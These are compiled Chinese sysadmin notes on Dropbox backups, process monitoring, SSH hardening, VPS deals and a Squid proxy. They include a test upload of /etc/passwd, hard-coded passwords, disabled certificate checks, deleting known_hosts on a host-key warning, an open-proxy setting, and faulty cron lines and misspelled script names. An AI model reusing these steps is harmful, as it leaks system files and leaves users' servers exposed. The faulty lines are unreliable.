为了方便区分目录,可以在Dropbox文件夹下新建backups文件夹,用于备份数据。
1)定时备份网站数据
将网站WEB目录连接到/Dropbox/backups文件夹下,假定/var/www/wordpress为网站web目录
cd ~/Dropbox/backups
ln -s /var/www/wordpress
2)定时备份数据库文件
新建一个定时备份数据库文件的脚本
vi ~/backup/mysqlbackup.sh
脚本内容如下:
echo "start mysql back up "${date} >> /root/backup/backup.log
mysqldump -uroot -p123456 wordpress >/root/backup/mysqlback.sql
其中,root为数据库的用户名,123456为数据库密码,wordpress为数据库名。
添加可执行权限
chmod a+x ~/backup/mysqlbackup.sh
将mysqlback.sql连接到/Dropbox/backups文件夹下
#!/bin/sh
cd ~/Dropbox/backups
ln -s ~/backup/mysqlback.sql
定时执行备份脚本文件,输入
crontab -e
添加以下内容
* 3 * * * /root/backup/mysqlbackup.sh
3)定时开闭dropbox linux客户端
dropbox一直开着会占用vps的内存资源,没有必要一直开着,可以利用脚本定时运行和关闭dropbox。
创建脚本 ~/backup/dropboxswitch.sh
vi ~/backup/dropboxswitch.sh
内容如下
#!/bin/sh
date=`date +%Y%m%d_%H:%M:%S`
start() {
echo "starting dropbox "${date} >> /root/backup/backup.log
/root/dropbox/.dropbox-dist/dropbox &
}
stop() {
echo "stoping dropbox "${date} >> /root/backup/backup.log
pkill dropbox
}
case "$1" in
start)
start
;;
stop)
stop
;;
restart)
stop
start
;;
esac
添加可执行权限
chmod a+x ~/backup/dropboxswitch.sh
然后定时每天凌晨4点启动dropbox,6点关闭:
crontab -e
添加以下内容
* 4 * * * /root/backup/dropboxswitch.sh start
* 6 * * * /root/backup/dropboxswitc.sh stop
脚本法备份数据
1、创建Dropbox应用
首先,需要创建一个Dropbox应用,可以从该网址进行创建:https://www.dropbox.com/developers/apps/create。
在这里,应用类型选择Dropbox API App,数据存储类型选择Files and datastores,权限选择Yes(应用只需要访问它创建的文件)。然后命名创建。
2、下载并执行dropbox_uploader.sh
dropbox_uploader 是一个第三方Dropbox备份脚本,首先下载脚本:
wget --no-check-certificate https://raw.githubusercontent.com/tennfy/Dropbox-Uploader/master/dropbox_uploader.sh
chmod a+x dropbox_uploader.sh
执行该脚本,绑定APP:
./dropbox_uploader.sh
根据提示输入Dropbox应用中的App key和App secret,许可类型选择a,确认y,复制给出的权限验证链接到浏览器,确认后回到终端按任意键完成。
之后可以执行下面的命令测试上传,提示Done就是绑定成功了:
./dropbox_uploader.sh upload /etc/passwd /backup/passwd.old
3、编写定时脚本
vi /root/backup.sh
内容如下:
#!/bin/bash
MYSQL_USER=root #mysql用户名
MYSQL_PASS=xxxxx #mysql密码
MYSQL_DATABASENAME=xxxxx #要备份的数据库名
WEB_DATA=/var/www/xxx #要备份的网站数据
#你要修改的地方从这里结束
# 定义备份存放目录
DROPBOX_DIR=/$(date +%Y-%m-%d) # Dropbox上的备份目录
LOCAL_BAK_DIR=/root/backup # 本地备份文件存放目录
#定义备份文件名字
DBBakName=Data_$(date +"%Y%m%d").tar.gz
WebBakName=Web_$(date +"%Y%m%d").tar.gz
# 定义旧数据名称
Old_DROPBOX_DIR=/$(date -d -3day +%Y-%m-%d)
OldDBBakName=Data_$(date -d -3day +"%Y%m%d").tar.gz
OldWebBakName=Web_$(date -d -3day +"%Y%m%d").tar.gz
#删除本地3天前的数据
rm -rf $LOCAL_BAK_DIR/$OldDBBakName $LOCAL_BAK_DIR/$OldWebBakName
./dropbox_uploader.sh delete $Old_DROPBOX_DIR/
#导出mysql数据库
mysqldump -u$MYSQL_USER -p$MYSQL_PASS $MYSQL_DATABASENAME > $LOCAL_BAK_DIR/wordpress.sql
#压缩数据库
tar zcvf $LOCAL_BAK_DIR/$DBBakName $LOCAL_BAK_DIR/wordpress.sql
rm -rf $LOCAL_BAK_DIR/wordpress.sql
#压缩网站数据
tar zcvf $LOCAL_BAK_DIR/$WebBakName $WEB_DATA
#开始上传
cd ~
./dropbox_uploader.sh upload $LOCAL_BAK_DIR/$DBBakName $DROPBOX_DIR/$DBBakName
./dropbox_uploader.sh upload $LOCAL_BAK_DIR/$WebBakName $DROPBOX_DIR/$WebBakName
echo -e "Backup Done!"
其中,用户可以根据自己的需求改编需要备份的目录,以及保留旧数据的时长(我这里设置的是3天)
如果mysql是编译安装,需要指定mysql的路径。
增加执行权限:
chmod +x /root/backup.sh
测试该备份脚本:
./backup.sh
4.设置定时任务
执行:
crontab –e
添加以下内容:
30 3 * * * /root/backup.sh
这样,就可以每天凌晨3:30自动备份到Dropbox了。
5.最后重启Crontab
service cron restart
重启之后就设置完成了
如果你不知道服务器当前时间,可以使用下面的命令,查看当前时间:
date -R
修改为当前时区
cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
即修改服务器时区为上海。
参考文章:
如何将VPS上的网站数据定时自动备份到Dropbox
利用dropbox备份vps数据
Dropbox用不了?
可以看看用快盘的:https://github.com/wujiwh/kuaipan_uploader
(二)如何将VPS上的网站数据定时自动备份到Dropbox
本文所讲内容为如何将网站上的文件以及数据库中的内容定时自动备份到Dropbox上。
1.创建Dropbox应用
首先,需要创建一个Dropbox应用(Dropbox目前需要翻墙),可以从该网址进行创建:https://www.dropbox.com/developers/apps/create。
在这里,应用类型选择Dropbox API App,数据存储类型选择Files and datastores,权限选择Yes(应用只需要访问它创建的文件)。然后命名创建。
2.下载并执行dropbox_uploader.sh
dropbox_uploader 是一个第三方Dropbox备份脚本,首先下载脚本:
curl "https://raw.githubusercontent.com/andreafabrizi/Dropbox-Uploader/master/dropbox_uploader.sh" -o dropbox_uploader.sh
然后,为该脚本添加执行权限:
chmod +x dropbox_uploader.sh
执行该脚本,绑定APP:
./dropbox_uploader.sh
根据提示输入Dropbox应用中的App key和App secret,许可类型选择a,确认y,复制给出的权限验证链接到浏览器,确认后回到终端按任意键完成。
之后可以执行下面的命令测试上传,提示Done就是绑定成功了:
./dropbox_uploader.sh upload /etc/passwd /backup/passwd.old
3.编写备份脚本
编写定时备份脚本,取名为backup.sh。其代码如下:
#!/bin/bash
# 定义需要备份的目录
WEB_DIR=/home/www # 网站数据存放目录
# 定义备份存放目录
DROPBOX_DIR=/$(date +%Y-%m-%d) # Dropbox上的备份目录
LOCAL_BAK_DIR=/home/backup # 本地备份文件存放目录
# 定义备份文件名称
DBBakName=DB_$(date +%Y%m%d).tar.gz
WebBakName=Web_$(date +%Y%m%d).tar.gz
# 定义旧数据名称
Old_DROPBOX_DIR=/$(date -d -7day +%Y-%m-%d)
OldDBBakName=DB_$(date -d -10day +%Y%m%d).tar.gz
OldWebBakName=Web_$(date -d -10day +%Y%m%d).tar.gz
cd $LOCAL_BAK_DIR
#使用命令导出数据库
mongodump --out $LOCAL_BAK_DIR/mongodb/ --db bastogne
#压缩数据库文件合并为一个压缩文件
tar zcf $LOCAL_BAK_DIR/$DBBakName $LOCAL_BAK_DIR/mongodb
rm -rf $LOCAL_BAK_DIR/mongodb
#压缩网站数据
cd $WEB_DIR
tar zcf $LOCAL_BAK_DIR/$WebBakName ./*
cd ~
#开始上传
./dropbox_uploader.sh upload $LOCAL_BAK_DIR/$DBBakName $DROPBOX_DIR/$DBBakName
./dropbox_uploader.sh upload $LOCAL_BAK_DIR/$WebBakName $DROPBOX_DIR/$WebBakName
#删除旧数据
rm -rf $LOCAL_BAK_DIR/$OldDBBakName $LOCAL_BAK_DIR/$OldWebBakName
./dropbox_uploader.sh delete $Old_DROPBOX_DIR/
echo -e "Backup Done!"
其中,用户可以根据自己的需求改编需要备份的目录,以及保留旧数据的时长(比如我这里设置的是Dropbox保留7天,本地保留10天)。
接下来,为这个备份脚本增加执行权限:
chmod +x backup.sh
测试该备份脚本:
./backup.sh
4.设置定时任务
执行:
crontab –e
添加:
30 3 * * * /root/backup.sh
这样,就可以每天凌晨3:30自动备份到Dropbox了。
5.最后重启Crontab
service cron restart
重启之后就设置完成了
如果你不知道服务器当前时间,可以使用下面的命令,查看当前时间:
date -R
修改当前时区:
cp /usr/share/zoneinfo/主时区/次时区 /etc/localtime
例如:
cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
即修改服务器时区为上海。
6.Reference
本文部分内容参考自:
https://timeting.com/27/use-scripts-auto-backup-vps-to-dropbox/
http://www.pythoner.com/324.html
https://gist.github.com/tonek/5383455
3.全自动定时备份VPS数据到Dropbox
相关脚本
nano backup.sh
放到哪里无所谓,记得赋予执行权限就可以了chmod +x backup.sh
#!/bin/bash
# Settings
DROPBOX_DIR="/Backups" #Dropbox中的文件夹名称
BACKUP_SRC="/home/wwwroot/website /home/wwwroot/database" #需要备份的文件夹路径,可以同时指定多个,32MB.CN用了Sqlite数据库,Sqlite以文件形式存放,故也要备份
BACKUP_DST="/miniVPS" #用来存放备份的文件夹路径
MYSQL_SERVER="127.0.0.1" #连接本地MySQL
MYSQL_USER="root" #本地MySQL的用户
MYSQL_PASS="123456" #本地MySQL的密码
# Stop editing here
NOW=$(date +"%Y.%m.%d")
DESTFILE="$BACKUP_DST/$NOW.tgz"
LAST=$(date -d "2 months ago" +"%Y.%m.%d") #这里的时间可以根据需要进行修改,如"3 months ago"
# Backup files
ps -e | grep -c mysql
if [ $? -eq 0 ]; then
echo "Dumping databases..."
/web/mysql/bin/mysqldump -u $MYSQL_USER -h $MYSQL_SERVER -p$MYSQL_PASS --all-databases > "$BACKUP_DST/$NOW-Databases.sql" #这里的命令路径可以根据需要进行修改
else
echo "ERROR. Now exiting..."
exit 1
fi
if [ $? -eq 0 ]; then
echo "Packing files..."
tar -czf "$DESTFILE" $BACKUP_SRC "$BACKUP_DST/$NOW-Databases.sql"
else
echo "ERROR. Now exiting..."
exit 1
fi
if [ $? -eq 0 ]; then
/home/backup/dropbox_uploader.sh upload "$DESTFILE" "$DROPBOX_DIR/$NOW.tgz" #这里的脚本路径可以根据需要进行修改
else
echo "ERROR. Now exiting..."
exit 1
fi
# Delete old files
if [ $? -eq 0 ]; then
/home/backup/dropbox_uploader.sh delete "$DROPBOX_DIR/$LAST.tgz" #这里的脚本路径可以根据需要进行修改
else
echo "ERROR. Now exiting..."
exit 1
fi
if [ $? -eq 0 ]; then
echo "Cleaning the backups..."
rm -f "$BACKUP_DST/$NOW-Databases.sql"
rm -f "$BACKUP_DST/$LAST.tgz"
else
echo "ERROR. Now exiting..."
exit 1
fi
其中的dropbox_uploader.sh是Dropbox上传下载脚本,
主页:http://www.andreafabrizi.it/?dropbox_uploader
apt-get install git
git clone http://github.com/andreafabrizi/Dropbox-Uploader.git
cd Dropbox-Uploader
chmod +x dropbox_uploader.sh
mv dropbox_uploader.sh /home/backup/
初始化脚本,并按照脚本中的提示到对应的Dropbox的网页中创建API,在脚本的交互界面中输入生成的Key
./dropbox_uploader.sh
初始化完成以后,便可以立即执行一次backup.sh脚本进行备份了
/home/backup/backup.sh
定时任务
光弄好了脚本可不行,没添加定时任务怎么定时备份。
crontab -e
设置为每天执行一次备份,具体时间可以根据需要进行修改
30 1 * * * sh /home/backup/bbackup.sh
from
Debian vps进程监控并自动重启
转载:Debian vps进程监控并自动重启
使用过lnmp一键包的同学可能很多都遇到502错误,解决502错误比较好的一个方法是定时重启php进程。由于linux的机制,进程占用过多内存时会被kill掉,此时也需要重启该进程。今天tennfy来介绍下如何对debian vps中进程进行监控并自动重启。
进程监控脚本
1、确定进程名
运行想要监控的程序之后,执行以下命令:
ps -ef
会列出系统中所有的进程,在CMD一列里找到该程序对应的进程名。
2、进程监控脚本
在root目录下新建monitor脚本
vi /root/monitor.sh
添加以下内容,注意将procname替换为待监控的进程名,/etc/init.d/procname restart替换为该进程的重启命令
#! /bin/sh
proc_name="procname" # 待监控进程名
number=`ps -ef | grep $proc_name | grep -v grep | wc -l`
if [ $number -eq 0 ] # 判断进程是否存在
then
/etc/init.d/procname restart # 重启进程的命令,请相应修改
fi
添加完成后,输入:wq保存修改。
设置可执行权限
chmod a+x /root/monitor.sh
添加到crontab定时任务
设置好脚本之后,添加到crontab定时任务中,每分钟执行一次脚本
echo "* * * * * root /root/monitor.sh >/dev/null 2>&1" >>/etc/crontab
/etc/init.d/cron restart
小结
如果你希望监控多个进程程序,添加多个脚本即可,该方法非常实用,很多时候都能用到。
vps
https://bandwagonhost.com/index.php
https://virmach.com/
vps安全设置:
ssh 登陆:
ssh root@127.0.0.1 -p 1234
改 root 密码
passwd root
输入两次密码<密码无显示>
如何知道自己的VPS账号正在遭受坏人的扫描和暴力破解呢?
简单的方法就是查看日志:cat /var/log/auth.log
改sshd端口
vi /etc/ssh/sshd_config
/etc/ssh/sshd_config
重启sshd服务:
/etc/init.d/sshd restart #CentOS 6
systemctl restart sshd.service #CentOS 7
参考https://blog.csdn.net/doubleface999/article/details/73358003
检查端口
netstat -nlpt | grep ssh
安装Centos7下安装netstat
yum install net-tools
root是Linux下权限最大的一个用户,
而也是黑客最喜欢的一个用户,
若获取到了root权限,则代表了您的VPS完全陷落,
所以,将root用户禁止登录SSH,
使用另外一个用户来管理您的VPS将是一个很不错的主意。
首先添加一个用户
添加用户:
useradd 123
给新用户设置密码:
passwd 123
更改SSH
vi /etc/ssh/sshd_config
添加配置AllowUsers root 123 #设置刚才创建的 123 可以登录
先把root也加上,不然登陆不了
重启下SSH
service sshd restart (/etc/init.d/sshd restart)
systemctl restart sshd.service #CentOS 7
限制su命令
vi /etc/pam.d/su
添加如下两行
centos 6
auth sufficient /lib/security/pam_rootok.so debug
auth required /lib/security/pam_wheel.so group=isd
执行
usermod -G10 123
这样就只有 123 用户可以使用su命令了
centos 7
centos7用户权限设置 https://blog.csdn.net/qooer_tech/article/details/41802717
auth required /usr/lib64/security/pam_wheel.so use_uid
auth sufficient /usr/lib64/security/pam_rootok.so debug
auth required /usr/lib64/security/pam_wheel.so group=wheel
修改/etc/login.defs文件,在最后添加SU_WHEEL_ONLY yes
将新添加的普通用户添加的wheel组中,命令usermod -G wheel 用户名
123切换到root
su - root
然后输入 root 密码
禁止ping
防止别人Ping通自己的服务器是一个很不错的安全设置,运行命令
此文件开始为空
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
这样别人Ping自己的服务器时就根本无法Ping通了
systemctl restart iptables.service
使用密匙登陆SSH
在VPS上 输入指纹登陆
生成4096位密钥
ssh-keygen -t rsa -b 4096
将公钥拷贝至服务器对应用户的.ssh下,重命名为authorized_keys
cat id_rsa.pub >> authorized_keys或
scp -P xxxxx ~/.ssh/id_rsa.pub server:/root/.ssh/authorized_keys
如果已经存在authorized_keys,需要将公钥追加至authorized_keys
scp -P xxxxx ~/.ssh/id_rsa.pub server:/root/.ssh/tmp.pub
# 在服务器端执行
cat /root/.ssh/tmp.pub >> /root/.ssh/authorized_keys
ssh 登陆 设置Putty SSH使用密钥登录Linux VPS主机
禁止使用密码登陆
vim /etc/ssh/sshd_config
PasswordAuthentication no
若报错
WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!
删除~/.ssh/known_hosts文件
rm ~/.ssh/known_hosts
检查登录日志
如果你的服务器一直很正常,那也可能不正常的表现,
最好的办法就是定期查询ssh的登录日志,手动发现系统的异常!
vim /etc/ssh/sshd_config
add LogLevel DEBUG
查看最近100条登录日志
tail -100 /var/log/secure
登录成功日志
who /var/log/wtmp
last
参考:
CentOS(5.8/6.4)linux生产环境若干优化实战
基于CentOS系统的VPS安全设置与优化
ubuntu
sudo apt-get update
apt-get install htop
apt-get install unzipapt-get -y install wget screen
centos
yum install -y unzip zip
cp -Rf /home/user1/* /root/temp/
将 /home/user1目录下的所有东西拷到/root/temp/下而不拷贝user1目录本身。
即格式为:cp -Rf 原路径/ 目的路径/
1024以下端口需要管理员权限
增强VPS 安全:改端口,禁用Root,密钥登录,Denyhosts防暴力攻击
洛杉矶MC
目前阿里新加坡的性价比最高
说实在的vultr牌子虽然比瓦工大,稳定性还是瓦工靠谱
dd if=/dev/zero of=test bs=64k count=4k oflag=dsync
自己测一测就知道了,不管超兽多少,是否正在搞促销,瓦工的io根本不崩
BandwagonHost搬瓦工
原官方网页隐藏优惠码(F12)(现在找不到了)
目前,BandwagonHost最新优惠码如下:
1、IAMSMART5K717Q (4%)
2、IAMSMART5EM2BR(4.28%)
3、IAMSMART5C48JJ(4.7%)
4、IAMSMART5SS6ML(4.72%)
5、IAMSMART5GRNII (4.82%)
6、IAMSMART5EL5BM(4.96%)
7、IAMSMART5FQ956 (5%)
8、BWH1ZBPVK(6%)
9、BWH26FXH3HIQ (6.25%)
10、BWH34QMFYT2R(6.38%)
SPECIAL PROMOCODE: IAMSMART5FQ956 - 5% Recurring Discount(5% Recurring Discount)
Bandwagonhost Promotional Code BWH1ZBPVK - 6% Recurring Discount
点我购买KVM 512M 500M/Month $18.99/Year 6 Locations
搬瓦工 CN2 两个机房的选择:DC3 和 DC8 哪个好?
瓦工我走自己的AFF没效果。
购买IP和你的账号Ip 要不一样,付款PP和收款PP也不一样
搬瓦工怎么选CN2?
dc3和dc8
SPECIAL为固定机房套餐,分CN2、CN2 GIA、香港三种线路
VZ - PROMO为OpenVZ可换机房套餐、 KVM - PROMO为KVM可换机房套餐,可切换到CN2,但流量变为1/3
Other VPS
https://virmach.com/special-offers
https://billing.virmach.com/cart.php?gid=22
https://bwh1.net/aff.php?aff=1830&pid=43 bwh1
https://bwh8.net/aff.php?aff=1830&pid=43 bwh8
https://miao.hu/2017/04/15/fuck-gfw
续期
2021年4月10日
包年包月2021-02-05 10:10:51到期
使用VPS 架设Http代理服务器
转载于:https://b.lxd.cc/squid.html
测试环境是Centos 6 x86
第一步:安装squid
yum install squid第二步
编辑/etc/squid/squid.conf
将http_access deny all 中deny 改为allow
http_port后面的是端口号,默认为3128。可改可不改。
第三步编辑 完成后
service squid restart即可
大功告成了。